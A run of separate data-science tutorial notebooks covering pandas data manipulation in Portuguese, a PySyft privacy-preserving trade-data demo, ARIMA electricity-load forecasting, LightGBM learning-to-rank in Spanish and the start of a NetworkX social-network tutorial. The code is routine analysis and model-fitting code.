loc[rows] dataframe.loc[:2] #Showing specific columns from the 
'dataframe' dataframe dataframe[['canal_venda', 'vendas']] #Passing a filter of the 'dataframe' dataframe in a list filtro = ['canal_venda', 'acessos'] #Showing the 'dataframe' dataframe with the filter dataframe[filtro] #Using the info() method dataframe.info() #Showing the default 'dataframe' dataframe dataframe #Pivoting the data in 'dataframe' dataframe aux = dataframe.pivot(index = 'canal_venda', columns='site', values='acessos') #Using the info() method in the 'aux' dataframe aux.info() #Completing the NaN values with the fillna method #Pivoting the data from the 'aux' dataframe aux = dataframe.pivot(index='canal_venda', columns='site', values='acessos').fillna(0) dataframe.pivot(index='canal_venda', columns='site', values='acessos').fillna(0) #Changing the columns using the melt() function dataframe.melt(id_vars='site', value_vars=['canal_venda']) #Reseting the index from the 'aux' dataframe print(aux.columns) aux = aux.reset_index() print(aux.columns) #Showing the new 'aux' dataframe aux #Example of the melt() function aux.melt(id_vars='canal_venda', value_vars=['site1', 'site2', 'site3']) #Adding the columns from the 'dataframe' dataframe dataframe.sum() #Adding the rows from the 'dataframe' dataframe dataframe.sum(axis=1) #Showing the 'dataframe' dataframe dataframe #Calculating the median (mediana) of numeric columns in the 'dataframe' dataframe print('Row:\n', dataframe.median(axis=1)) print('Column:\n', dataframe.median()) #Calculating the mean (média) of numeric columns in the 'dataframe' dataframe dataframe.mean() #Calculating the standard deviation (desvio padrão) of numeric columns in the 'dataframe' dataframe dataframe.std() #Calculating the mode (moda) of numeric columns in the 'dataframe' dataframe dataframe.mode() #Calculating the descriptive statistics from the numeric columns in the 'dataframe' dataframe using describe() dataframe.describe() #Calculating the maximum (máximo) value from each numeric columns in the 'dataframe' dataframe 
dataframe.max() #Calculating the minimum (mínimo) value from each numeric columns in the 'dataframe' dataframe dataframe.min() #Showing the unique values from a specific column from the 'dataframe' dataframe dataframe['site'].unique() #Showing the number of unique values from each column in the 'dataframe' dataframe dataframe.nunique() #Counting the unique values from a specific column from the 'dataframe' dataframe dataframe['canal_venda'].value_counts() #Using groupby with the numeric values and sum dataframe.groupby('site')['acessos'].sum() #Using groupby with the numeric values and median dataframe.groupby('canal_venda')['acessos'].median() #Using groupby with categories values and unique dataframe.groupby('site')['canal_venda'].unique() #Using groupy with categories values and first dataframe.groupby('site')['canal_venda'].first() #Using groupby with the aggregation function dataframe.groupby('canal_venda').agg({'site':'unique', 'acessos':'sum'}) #Correlation between variables (features) dataframe.corr(method='spearman') #Showing the 'dataframe' dataframe dataframe #Creating categorical variables by numeric variable slice dataframe['categoria_vendas'] = pd.cut(dataframe['vendas'], bins= (0, 1500, 2000, 8000), labels = ('0 a 1500', '1500 a 2000', '2000 a 8000')) dataframe #Creating categorical variable using list compression dataframe['categoria_acessos'] = ['maior_que_300' if x > 300 else 'menor_que_300' for x in dataframe['acessos']] dataframe #Creating a second dataframe dataframe_2 = pd.DataFrame({'site': ['site1', 'site1', 'site2', 'site2', 'site3'], 'suporte': ['Carlos', 'Carlos', 'Maria', 'Maria', 'Ezequiel']}) #Merging the two dataframes ('dataframe' and 'dataframe_2') dataframe.merge(dataframe_2, on='site', how='left') ``` #### 5. 
Manipulando Arquivos .csv ``` #Saving the 'dataframe' dataframe as a .csv file dataframe.to_csv('dataframe.csv', sep=';', decimal=',', index=False) #Reading the .csv file and saving in the 'dataframe_lido' dataframe dataframe_lido = pd.read_csv('dataframe.csv', sep=';', decimal=',') #Showing the head from the 'dataframe_lido' dataframe dataframe_lido.head() #Reading the 'train.csv' file df = pd.read_csv('train.csv') df #Creating a 'aux' dataframe with some characteristics from the 'train.csv' file aux = pd.DataFrame({'colunas': df.columns, 'tipos': df.dtypes, 'percentual_faltante': df.isna().sum() / df.shape[0]}) aux #Complete the NaN data on the numeric 'Age' column with the mode of the column df['Age'] = df['Age'].fillna(df['Age'].mode()) #Complete the NaN data on the categorical 'Cabin' column with 'Unknown' df['Cabin'] = df['Cabin'].fillna('Unknown') #Showing the sum of values from the 'Cabin' column df['Cabin'].value_counts() #Showing the number of rows and columns from the 'df' dataframe df.shape ``` #### 6. Manipulando Arquivos .json ``` json = pd.read_json('https://pricing.us-east-1.amazonaws.com/offers/v1.0/aws/index.json') json.reset_index(inplace=True) json['offers'][99] json['index'] ```
github_jupyter
### Trade Demo #### Goals: - Login to the Canada domain. - Select the dataset. - Cacluate the sum of total of good imported to Egypt. - Publish the result - Download the results ### Step 1: Login into the Canada domain ``` %load_ext autoreload %autoreload 2 # As a Data Scientist we want to perform some analysis on the trade dataset available on the Canada domain. # Our goal is to calculate the sum total of the goods imported (imports + re-imports) to Egypt import syft as sy # Let's login into the canada domain # canada_domain_node = sy.login(email="sheldon@caltech.edu", password="bazinga", port=8081) canada_domain_node = sy.login(email="info@openmined.org", password="changethis", port=8081) ``` ### Step 2: Select the dataset ``` # Awesome !!! We're logged into the domain node # Let's quickly list all the datasets available on the Canada domain canada_domain_node.datasets feb2020 = canada_domain_node.datasets[-1]['feb2020'] # Let's try to get the whole dataset itself. feb2020.request(reason="Access whole dataset") ``` #### STOP: Return to Data Owner-Canada.ipynb - STEP 8!! ### Step 3: Try to download the whole dataset ``` # Let's see if our request was accepted out = feb2020.publish(client=canada_domain_node ,sigma=1.0) out.get() # Seems, like the request to download the whole dataset was denied by the Data Owner. ``` ### Step 4: Private - Public Mutiplication # dataset_columns = [ "Classification", "Year", "Period", "Period Desc.", "Aggregate Level", "Is Leaf Code", "Trade Flow Code", "Trade Flow", "Reporter Code", "Reporter", "Reporter ISO", "Partner Code", "Partner", "Partner ISO", "Commodity Code", "Commodity", "Qty Unit Code", "Qty Unit", "Qty", "Netweight (kg)", "Trade Value (US$)", "Flag", ] # Since the columns are represented by indicies in the private tensor, # let's create a column to index map. column_to_index_map = {c: i for i, c in enumerate(dataset_columns)} column_to_index_map ``` # Let's calculate the value of the goods imported from Egypt. 
# Partner Code for Egypt is : 818 partner_code_for_egypt = 818 trade_flow_codes_map = { "imports": 1, "exports": 2, "re-exports":3, "re-imports":4, } # Breaking it down partner_codes = feb2020[:, column_to_index_map["Partner Code"]] trade_flow_code = feb2020[:, column_to_index_map["Trade Flow Code"]] egypt_mask = partner_codes == partner_code_for_egypt imports_mask = trade_flow_code == trade_flow_codes_map["imports"] # Let's calculate the goods imported from Egypt value_of_goods_imported_from_egypt_mask = egypt_mask * imports_mask out = value_of_goods_imported_from_egypt_mask.publish(client=canada_domain_node ,sigma=1.0) out.get() # Let's continue with the analysis remotely. # Let's calculate the value of the goods re-imported from Egypt. value_of_goods_reimported_from_egypt_mask = ( feb2020[:, column_to_index_map["Partner Code"]] == partner_code_for_egypt ) * (feb2020[:, column_to_index_map["Trade Flow Code"]] == trade_flow_codes_map["re-imports"]) # Selecting Trade values for imports and re-imports (Private - Private Multiplication) value_of_goods_imported_from_egypt = feb2020[:, column_to_index_map["Trade Value (US$)"]] * value_of_goods_imported_from_egypt_mask value_of_goods_reimported_from_egypt = feb2020[:, column_to_index_map["Trade Value (US$)"]] * value_of_goods_reimported_from_egypt_mask # Let's scale the trade value by 1000 - (Private - Public Multiplication) scaled_value_of_goods_imported_from_egypt = value_of_goods_imported_from_egypt * (0.001) scaled_value_of_goods_reimported_from_egypt = value_of_goods_reimported_from_egypt * (0.001) ``` ### Step 5: Private - Private Addition ``` # sigma -> Amount of noise added to the response. # Larger the sigma, smaller the budget spent. 
# Calculating the total imported goods (Private - Private Addition) private_total_imported_goods_value = scaled_value_of_goods_imported_from_egypt + scaled_value_of_goods_reimported_from_egypt private_total_imported_goods_value = private_total_imported_goods_value.sum() public_total_imported_goods_value = private_total_imported_goods_value.publish(client=canada_domain_node ,sigma=1.0) print(private_total_imported_goods_value.id_at_location) print(public_total_imported_goods_value.id_at_location) private_total_imported_goods_value.update_searchability(pointable=True) ``` ### Step 6: Download Results ``` # Let's download the results canada_domain_node.store total_imported_goods_value = public_total_imported_goods_value.get() print(f"Total trade value($) of the goods Imported from Egypt to Canada: ${total_imported_goods_value}") # b65f0512fd814ec58520b9cf009cada1> ``` *Great !!! We successfully finished our analysis.* # CONGRATULATIONS!!! You've finished the demo!
github_jupyter
# One step univariate model - ARIMA In this notebook, we demonstrate how to: - prepare time series data for training an ARIMA times series forecasting model - implement a simple ARIMA model to forecast the next HORIZON steps ahead (time *t+1* through *t+HORIZON*) in the time series - evaluate the model on a test dataset The data in this example is taken from the GEFCom2014 forecasting competition<sup>1</sup>. It consists of 3 years of hourly electricity load and temperature values between 2012 and 2014. The task is to forecast future values of electricity load. In this example, we show how to forecast one time step ahead, using historical load data only. <sup>1</sup>Tao Hong, Pierre Pinson, Shu Fan, Hamidreza Zareipour, Alberto Troccoli and Rob J. Hyndman, "Probabilistic energy forecasting: Global Energy Forecasting Competition 2014 and beyond", International Journal of Forecasting, vol.32, no.3, pp 896-913, July-September, 2016. ``` import sys sys.path.append('..') import os import warnings import matplotlib.pyplot as plt import numpy as np import pandas as pd import datetime as dt import math from pandas.tools.plotting import autocorrelation_plot from pyramid.arima import auto_arima from statsmodels.tsa.statespace.sarimax import SARIMAX from sklearn.preprocessing import MinMaxScaler from common.utils import load_data, mape %matplotlib inline pd.options.display.float_format = '{:,.2f}'.format np.set_printoptions(precision=2) warnings.filterwarnings("ignore") # specify to ignore warning messages # Set for demo purposes (shorter run) demo = False ``` Load the data from csv into a Pandas dataframe ``` energy = load_data('../data')[['load']] energy.head() ``` Plot all available load data (January 2012 to Dec 2014) ``` energy.plot(y='load', subplots=True, figsize=(15, 8), fontsize=12) plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ``` Plot first week of July 2014 ``` energy['2014-07-01':'2014-07-07'].plot(y='load', subplots=True, 
figsize=(15, 8), fontsize=12) plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ``` ## Create training and testing data sets We separate our dataset into train and test sets. We train the model on the train set. After the model has finished training, we evaluate the model on the test set. We must ensure that the test set covers a later period in time than the training set, to ensure that the model does not gain information from future time periods. We will allocate the period 1st November 2014 to 30th November 2014 to the training set (1 month) and the period from 1st December 2014 onwards to the test set (1 month). Since this is daily consumption of energy, there is a strong seasonal pattern, but the consumption is most similar to the consumption in the recent days. Therefore, using a relatively small window of time for training the data should be sufficient. ``` train_start_dt = '2014-11-01 00:00:00' if(not demo): test_start_dt = '2014-12-01 00:00:00' else: test_start_dt = '2014-12-30 00:00:00' energy[(energy.index < test_start_dt) & (energy.index >= train_start_dt)][['load']].rename(columns={'load':'train'}) \ .join(energy[test_start_dt:][['load']].rename(columns={'load':'test'}), how='outer') \ .plot(y=['train', 'test'], figsize=(15, 8), fontsize=12) plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ``` ## Data preparation Our data preparation for the training set will involve the following steps: 1. Filter the original dataset to include only that time period reserved for the training set 2. 
Scale the time series such that the values fall within the interval (0, 1) Create training set containing only the model features ``` train = energy.copy()[(energy.index >= train_start_dt) & (energy.index < test_start_dt)][['load']] test = energy.copy()[energy.index >= test_start_dt][['load']] print('Training data shape: ', train.shape) print('Test data shape: ', test.shape) ``` Scale data to be in range (0, 1). This transformation should be calibrated on the training set only. This is to prevent information from the validation or test sets leaking into the training data. ``` scaler = MinMaxScaler() train['load'] = scaler.fit_transform(train) train.head(10) ``` Original vs scaled data: ``` energy[energy.index < train_start_dt][['load']].rename(columns={'load':'original load'}).plot.hist(bins=100, fontsize=12) train.rename(columns={'load':'scaled load'}).plot.hist(bins=100, fontsize=12) plt.show() ``` Let's also scale the test data ``` test['load'] = scaler.transform(test) test.head() ``` ## Implement ARIMA method An ARIMA model, which stands for **A**uto**R**egressive **I**ntegrated **M**oving **A**verage, can be created using the statsmodels library. In the next section, we perform the following steps: 1. Define the model by calling SARIMAX() and passing in the model parameters: p, d, and q parameters, and P, D, and Q parameters. 2. The model is prepared on the training data by calling the fit() function. 3. Predictions can be made by calling the forecast() function and specifying the number of steps (horizon) for which to forecast In an ARIMA model there are 3 parameters that are used to help model the major aspects of a time series: seasonality, trend, and noise. These parameters are: - **p** is the parameter associated with the auto-regressive aspect of the model, which incorporates past values. - **d** is the parameter associated with the integrated part of the model, which affects the amount of differencing to apply to a time series. 
- **q** is the parameter associated with the moving average part of the model. If our model has a seasonal component, we use a seasonal ARIMA model (SARIMA). In that case we have another set of parameters: P, D, and Q which describe the same associations as p, d, and q, but correspond with the seasonal components of the model. ``` # Specify the number of steps to forecast ahead HORIZON = 3 if demo else 24 ``` Let’s look at an autocorrelation plot of the time series. The example below plots the autocorrelation for 48 lags in the time series. ``` autocorrelation_plot(train[1:48]) plt.show() ``` We can see that there is a significant positive correlation with the first 4 or 5 lags. That may be a good starting point for the AR parameter (p) of the model. The plot of energy load over time (see above) shows that the time series is not stationary due to its seasonality (daily peaks and also peaks in August and February due to the increased energy usage). This suggests that a certain degree of differencing of the data might be necessary. ``` train['load'].diff(periods=24).plot(y='load', figsize=(15, 8), fontsize=12) plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ``` Even after differencing the data by 24 hours (the seasonal frequency), we still see a seasonal trend in the data. Selecting the best parameters for an ARIMA model can be challenging - somewhat subjective and time intensive, so we'll leave it as an exercise to the user. We used an **auto_arima()** function to search a provided space of parameters for the best model. 
``` # Model search takes a while, so don't run it during the demo auto_tune = False if (auto_tune): auto_model = auto_arima(train, start_p=1, start_q=0, max_p=5, max_q=0, m=24, start_P=0, max_P=2,Q=0, seasonal=True, d=1, D=1, trace=True, error_action='ignore', suppress_warnings=True, stepwise=True) print(auto_model.aic()) print(auto_model.summary()) order = (4, 1, 0) seasonal_order = (1, 1, 0, 24) model = SARIMAX(endog=train, order=order, seasonal_order=seasonal_order) results = model.fit() print(results.summary()) ``` Next we display the distribution of residuals. A zero mean in the residuals may indicate that there is no bias in the prediction. ``` # plot residual errors residuals = pd.DataFrame(results.resid[0:100]) residuals.plot() plt.show() residuals.plot(kind='kde') plt.show() print(residuals.describe()) ``` ## Evaluate the model We will perform the so-called **walk forward validation**. In practice, time series models are re-trained each time a new data becomes available. This allows the model to make the best forecast at each time step. Starting at the beginning of the time series, we train the model on the train data set. Then we make a prediction on the next time step. The prediction is then evaluated against the known value. The training set is then expanded to include the known value and the process is repeated. (Note that we keep the training set window fixed, for more efficient training, so every time we add a new observation to the training set, we remove the observation from the beginning of the set.) This process provides a more robust estimation of how the model will perform in practice. However, it comes at the computation cost of creating so many models. This is acceptable if the data is small or if the model is simple, but could be an issue at scale. Walk-forward validation is the gold standard of time series model evaluation and is recommended for your own projects. Create a test data point for each HORIZON step. 
``` test_shifted = test.copy() for t in range(1, HORIZON): test_shifted['load+'+str(t)] = test_shifted['load'].shift(-t, freq='H') test_shifted = test_shifted.dropna(how='any') test_shifted.head(5) ``` Make predictions on the test data ``` %%time training_window = 720 # dedicate 30 days (720 hours) for training train_ts = train['load'] test_ts = test_shifted history = [x for x in train_ts] history = history[(-training_window):] predictions = list() for t in range(test_ts.shape[0]): model = SARIMAX(endog=history, order=order, seasonal_order=seasonal_order) model_fit = model.fit() yhat = model_fit.forecast(steps = HORIZON) predictions.append(yhat) obs = list(test_ts.iloc[t]) # move the training window history.append(obs[0]) history.pop(0) print(t+1, '. Predicting time step: ', test_ts.index[t]) # print(t+1, ': predicted =', yhat, 'expected =', obs) ``` Compare predictions to actual load ``` eval_df = pd.DataFrame(predictions, columns=['t+'+str(t) for t in range(1, HORIZON+1)]) eval_df['timestamp'] = test.index[0:len(test.index)-HORIZON+1] eval_df = pd.melt(eval_df, id_vars='timestamp', value_name='prediction', var_name='h') eval_df['actual'] = np.array(np.transpose(test_ts)).ravel() eval_df[['prediction', 'actual']] = scaler.inverse_transform(eval_df[['prediction', 'actual']]) eval_df.head() ``` Compute the mean absolute percentage error over all predictions ``` if(HORIZON > 1): eval_df['APE'] = (eval_df['prediction'] - eval_df['actual']).abs() / eval_df['actual'] print(eval_df.groupby('h')['APE'].mean()) print('One step forecast MAPE: ', (mape(eval_df[eval_df['h'] == 't+1']['prediction'], eval_df[eval_df['h'] == 't+1']['actual']))*100, '%') print('One step forecast MAPE: ', mape(eval_df['prediction'], eval_df['actual'])*100, '%') ``` Plot the predictions vs the actuals for the first week of the test set ``` if(HORIZON == 1): ## Plotting single step forecast eval_df.plot(x='timestamp', y=['actual', 'prediction'], style=['r', 'b'], figsize=(15, 8)) else: ## Plotting 
multi step forecast plot_df = eval_df[(eval_df.h=='t+1')][['timestamp', 'actual']] for t in range(1, HORIZON+1): plot_df['t+'+str(t)] = eval_df[(eval_df.h=='t+'+str(t))]['prediction'].values fig = plt.figure(figsize=(15, 8)) ax = plt.plot(plot_df['timestamp'], plot_df['actual'], color='red', linewidth=4.0) ax = fig.add_subplot(111) for t in range(1, HORIZON+1): x = plot_df['timestamp'][(t-1):] y = plot_df['t+'+str(t)][0:len(x)] ax.plot(x, y, color='blue', linewidth=4*math.pow(.9,t), alpha=math.pow(0.8,t)) ax.legend(loc='best') plt.xlabel('timestamp', fontsize=12) plt.ylabel('load', fontsize=12) plt.show() ```
github_jupyter
## Probemos un poquito Learning to Rank con la librería LightGBM Seguimos el ejemplo del código en https://mlexplained.com/2019/05/27/learning-to-rank-explained-with-code/ Para eso hay que descargar los datos con el archivo trans_data.py, ejecutando retrieve_30k.sh #### Para Linux Si el sistema que corren es Linux, se puede ejecutar la celda siguiente. ``` ! sh retrieve_30k.sh ``` #### Para Windows En el caso de Windows, deben tener instalado [7zip](https://www.7-zip.org/) primero. Luego deberán ejecutar las siguientes celdas. ``` !pip install patool import os import patoolib import requests rarfile = requests.get("https://s3-us-west-2.amazonaws.com/xgboost-examples/MQ2008.rar") with open("./MQ2008.rar", "wb") as fh: fh.write(rarfile.content) patoolib.extract_archive("./MQ2008.rar", outdir="./") os.system("move /-y MQ2008\Fold1\*.txt .") !python trans_data.py train.txt mq2008.train mq2008.train.group !python trans_data.py test.txt mq2008.test mq2008.test.group !python trans_data.py vali.txt mq2008.vali mq2008.vali.group ``` ## Learning to Rank ``` # Importemos las librerías más importantes import lightgbm as lgb import numpy as np from sklearn.datasets import load_svmlight_file from scipy.stats import spearmanr # Carguemos los archivos que pudimos bajar con el script trans_data.py x_train, y_train = load_svmlight_file("mq2008.train") x_valid, y_valid = load_svmlight_file("mq2008.vali") x_test, y_test = load_svmlight_file("mq2008.test") y_train q_train = np.loadtxt('mq2008.train.group') q_valid = np.loadtxt('mq2008.vali.group') q_test = np.loadtxt('mq2008.test.group') x_test q_test y_test[:8] # LGBMRanker doc: https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.LGBMRanker.html gbm = lgb.LGBMRanker() gbm.fit( x_train, y_train, group=q_train, eval_set=[(x_valid, y_valid)], eval_group=[q_valid], eval_at=[1, 3], early_stopping_rounds=20, verbose=True, callbacks=[lgb.reset_parameter(learning_rate=lambda x: 0.95 ** x * 0.1)] ) # Tiremos el predictor sobre los 
datos de test preds_test = gbm.predict(x_test) preds_test # Usemos la métrica de Spearman para correlación de Rankings # https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.spearmanr.html spearmanr(y_test, preds_test) ``` ## Agrupemos todo el dataset y reentrenemos! ``` q_train = [x_train.shape[0]] q_valid = [x_valid.shape[0]] q_test = [x_test.shape[0]] gbm = lgb.LGBMRanker() gbm.fit( x_train, y_train, group=q_train, eval_set=[(x_valid, y_valid)], eval_group=[q_valid], eval_at=[1, 3], early_stopping_rounds=20, verbose=True, callbacks=[lgb.reset_parameter(learning_rate=lambda x: 0.95 ** x * 0.1)] ) preds_test = gbm.predict(x_test) preds_test spearmanr(y_test, preds_test) ```
github_jupyter
This tutorial is Part 1 of an introduction to social network analysis in Python. It covers how to structure network data, as well as how to use NetworkX to: construct graphs, explore their features, and implement simple algorithms. The primary example used for replication is Zachary's (1977) paper on divisions within a collegiate karate club. The paper is available [here](https://www.jstor.org/stable/pdf/3629752.pdf) and is the source of all tables/figures included below. We use the built-in dataset available from NetworkX, supplemented with a parsed and cleaned version of the weights provided [here](http://vlado.fmf.uni-lj.si/pub/networks/data/ucinet/ucidata.htm#zachary). <h1>Table of Contents<span class="tocSkip"></span></h1> <div class="toc"><ul class="toc-item"><li><span><a href="#Working-with-network-data" data-toc-modified-id="Working-with-network-data-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Working with network data</a></span><ul class="toc-item"><li><span><a href="#Structuring-network-data" data-toc-modified-id="Structuring-network-data-1.1"><span class="toc-item-num">1.1&nbsp;&nbsp;</span>Structuring network data</a></span><ul class="toc-item"><li><span><a href="#(Optional)-Subway-example" data-toc-modified-id="(Optional)-Subway-example-1.1.1"><span class="toc-item-num">1.1.1&nbsp;&nbsp;</span>(Optional) Subway example</a></span></li></ul></li><li><span><a href="#Types-of-network-datasets" data-toc-modified-id="Types-of-network-datasets-1.2"><span class="toc-item-num">1.2&nbsp;&nbsp;</span>Types of network datasets</a></span></li><li><span><a href="#Storing-network-data" data-toc-modified-id="Storing-network-data-1.3"><span class="toc-item-num">1.3&nbsp;&nbsp;</span>Storing network data</a></span></li></ul></li><li><span><a href="#Preparing-network-data-with-NetworkX" data-toc-modified-id="Preparing-network-data-with-NetworkX-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Preparing network data with NetworkX</a></span><ul 
class="toc-item"><li><span><a href="#Building-a-graph-from-scratch" data-toc-modified-id="Building-a-graph-from-scratch-2.1"><span class="toc-item-num">2.1&nbsp;&nbsp;</span>Building a graph from scratch</a></span><ul class="toc-item"><li><span><a href="#Initializing-a-graph" data-toc-modified-id="Initializing-a-graph-2.1.1"><span class="toc-item-num">2.1.1&nbsp;&nbsp;</span>Initializing a graph</a></span></li><li><span><a href="#Adding-nodes" data-toc-modified-id="Adding-nodes-2.1.2"><span class="toc-item-num">2.1.2&nbsp;&nbsp;</span>Adding nodes</a></span></li><li><span><a href="#Adding-edges" data-toc-modified-id="Adding-edges-2.1.3"><span class="toc-item-num">2.1.3&nbsp;&nbsp;</span>Adding edges</a></span></li></ul></li><li><span><a href="#Building-a-graph-from-an-edgelist" data-toc-modified-id="Building-a-graph-from-an-edgelist-2.2"><span class="toc-item-num">2.2&nbsp;&nbsp;</span>Building a graph from an edgelist</a></span></li><li><span><a href="#Building-special-graph-types" data-toc-modified-id="Building-special-graph-types-2.3"><span class="toc-item-num">2.3&nbsp;&nbsp;</span>Building special graph types</a></span><ul class="toc-item"><li><span><a href="#Weighted-graphs" data-toc-modified-id="Weighted-graphs-2.3.1"><span class="toc-item-num">2.3.1&nbsp;&nbsp;</span>Weighted graphs</a></span></li><li><span><a href="#Directed-graphs" data-toc-modified-id="Directed-graphs-2.3.2"><span class="toc-item-num">2.3.2&nbsp;&nbsp;</span>Directed graphs</a></span></li></ul></li><li><span><a href="#Importing-built-in-graphs" data-toc-modified-id="Importing-built-in-graphs-2.4"><span class="toc-item-num">2.4&nbsp;&nbsp;</span>Importing built-in graphs</a></span></li></ul></li><li><span><a href="#Analyzing-network-data" data-toc-modified-id="Analyzing-network-data-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>Analyzing network data</a></span><ul class="toc-item"><li><span><a href="#Inspecting-graphs" data-toc-modified-id="Inspecting-graphs-3.1"><span 
class="toc-item-num">3.1&nbsp;&nbsp;</span>Inspecting graphs</a></span><ul class="toc-item"><li><span><a href="#Graph-size" data-toc-modified-id="Graph-size-3.1.1"><span class="toc-item-num">3.1.1&nbsp;&nbsp;</span>Graph size</a></span></li><li><span><a href="#Node-data" data-toc-modified-id="Node-data-3.1.2"><span class="toc-item-num">3.1.2&nbsp;&nbsp;</span>Node data</a></span></li><li><span><a href="#Edge-data" data-toc-modified-id="Edge-data-3.1.3"><span class="toc-item-num">3.1.3&nbsp;&nbsp;</span>Edge data</a></span></li></ul></li><li><span><a href="#Local-structure" data-toc-modified-id="Local-structure-3.2"><span class="toc-item-num">3.2&nbsp;&nbsp;</span>Local structure</a></span><ul class="toc-item"><li><span><a href="#Exploring-neighbors" data-toc-modified-id="Exploring-neighbors-3.2.1"><span class="toc-item-num">3.2.1&nbsp;&nbsp;</span>Exploring neighbors</a></span></li><li><span><a href="#Exploring-degree" data-toc-modified-id="Exploring-degree-3.2.2"><span class="toc-item-num">3.2.2&nbsp;&nbsp;</span>Exploring degree</a></span></li><li><span><a href="#Local-bridges" data-toc-modified-id="Local-bridges-3.2.3"><span class="toc-item-num">3.2.3&nbsp;&nbsp;</span>Local bridges</a></span></li><li><span><a href="#Connected-components" data-toc-modified-id="Connected-components-3.2.4"><span class="toc-item-num">3.2.4&nbsp;&nbsp;</span>Connected components</a></span></li></ul></li><li><span><a href="#Algorithms" data-toc-modified-id="Algorithms-3.3"><span class="toc-item-num">3.3&nbsp;&nbsp;</span>Algorithms</a></span><ul class="toc-item"><li><span><a href="#Shortest-path" data-toc-modified-id="Shortest-path-3.3.1"><span class="toc-item-num">3.3.1&nbsp;&nbsp;</span>Shortest path</a></span></li><li><span><a href="#Max-flow-/-min-cut" data-toc-modified-id="Max-flow-/-min-cut-3.3.2"><span class="toc-item-num">3.3.2&nbsp;&nbsp;</span>Max flow / min cut</a></span><ul class="toc-item"><li><span><a href="#Find-the-minimum-cut" 
data-toc-modified-id="Find-the-minimum-cut-3.3.2.1"><span class="toc-item-num">3.3.2.1&nbsp;&nbsp;</span>Find the minimum cut</a></span></li></ul></li></ul></li></ul></li><li><span><a href="#Exporting-NetworkX-graphs-to-other-data-structures" data-toc-modified-id="Exporting-NetworkX-graphs-to-other-data-structures-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>Exporting NetworkX graphs to other data structures</a></span><ul class="toc-item"><li><span><a href="#As-edgelist" data-toc-modified-id="As-edgelist-4.1"><span class="toc-item-num">4.1&nbsp;&nbsp;</span>As edgelist</a></span></li><li><span><a href="#As-dictionary" data-toc-modified-id="As-dictionary-4.2"><span class="toc-item-num">4.2&nbsp;&nbsp;</span>As dictionary</a></span></li><li><span><a href="#As-adjacency-matrix" data-toc-modified-id="As-adjacency-matrix-4.3"><span class="toc-item-num">4.3&nbsp;&nbsp;</span>As adjacency matrix</a></span></li></ul></li><li><span><a href="#Wrap-up" data-toc-modified-id="Wrap-up-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>Wrap-up</a></span><ul class="toc-item"><li><span><a href="#Plots" data-toc-modified-id="Plots-5.1"><span class="toc-item-num">5.1&nbsp;&nbsp;</span>Plots</a></span></li><li><span><a href="#Conclusion" data-toc-modified-id="Conclusion-5.2"><span class="toc-item-num">5.2&nbsp;&nbsp;</span>Conclusion</a></span></li></ul></li></ul></div> Let's get started! First, we need to import all of the packages we'll use to do our analysis. 
``` import pandas as pd # For analyzing tabular data import numpy as np # For working with arrays and numerical operations import networkx as nx # For network data specifically import matplotlib.pyplot as plt # For making plots from pyvis import network as pv # For making interactive plots import pprint # For making output easier to read %matplotlib inline pd.set_option('display.max_columns', None) # For preventing horizontal shortening of tables when displayed print(nx.__version__) # Confirm that we have the latest networkx version ``` # Working with network data ## Structuring network data The first challenge you'll face is figuring out how to structure your network data: - What entities will form the **nodes** or **vertices**? - What will define the **edges** or **links**? In some cases the answer may seem obvious. For example, we are used to thinking about friendship networks, in which the nodes are people, and the edges are personal connections. In other cases, the natural representation is less clear. <div class="alert alert-success"> <b>Example:</b> Consider the Spotify dataset. - Are nodes: songs, albums, artists, playlists, genres, or listeners? - What should the links between these entities be? There are many different possible ways to structure this data. The right answer will depend on the question you're asking. </div> ### (Optional) Subway example For example, consider the NYC subway. 
An intuitive representation might have subway stops as nodes, and subway lines as edges: <img src="figures/degree.png" style="width: 500px;"/> However, we could also build a network of lines connected by transfers: <img src="figures/c_space.png" style="width: 500px;"/> Or a bi-partite network in which nodes are lines and stations, and edges represent the fact that a line stops at a station: <img src="figures/b_space.png" style="width: 700px;"/> ## Types of network datasets Once you have your nodes and edges, recall that there are two helpful dimensions along which networks can be categorized: 1. Whether their edges are **directed** or **undirected** 2. Whether their edges are **weighted** or **unweighted** In this tutorial, we will discuss how to store and work with data from these different types of networks. ``` H = nx.DiGraph([('A', 'B'), ('A', 'E'), ('B', 'C'), ('B', 'D'), ('C', 'D'), ('D', 'A'), ('E', 'D')]) fig, ax = plt.subplots(2,2, figsize=[7,7]) pos = nx.kamada_kawai_layout(H) nx.draw(H, pos=pos, node_color='cornflowerblue', node_size=1000, arrows=False, width=3, ax=ax[0][0]) nx.draw(H, pos=pos, node_color='cornflowerblue', node_size=1000, arrowsize=30, width=3, ax=ax[0][1]) nx.draw(H, pos=pos, node_color='cornflowerblue', node_size=1000, arrows=False, width=3, ax=ax[1][0]) nx.draw(H, pos=pos, node_color='cornflowerblue', node_size=1000, arrows=False, width=3, ax=ax[1][1]) heavy = [('E', 'D'), ('B', 'D'), ('C', 'D')] medium = [('A', 'E'), ('D', 'A')] nx.draw_networkx_edges(H, pos=pos, edgelist=heavy, width=10, ax=ax[1][1]) nx.draw_networkx_edges(H, pos=pos, edgelist=medium, width=5, ax=ax[1][1]) ax[0][0].set_title("Undirected") ax[0][1].set_title("Directed") ax[1][0].set_title("Unweighted") ax[1][1].set_title("Weighted") plt.show() ``` ## Storing network data One of the first challenges of working with network data is to figure out how to store information about the network structure. There are three common ways to store network structure data: 1. 
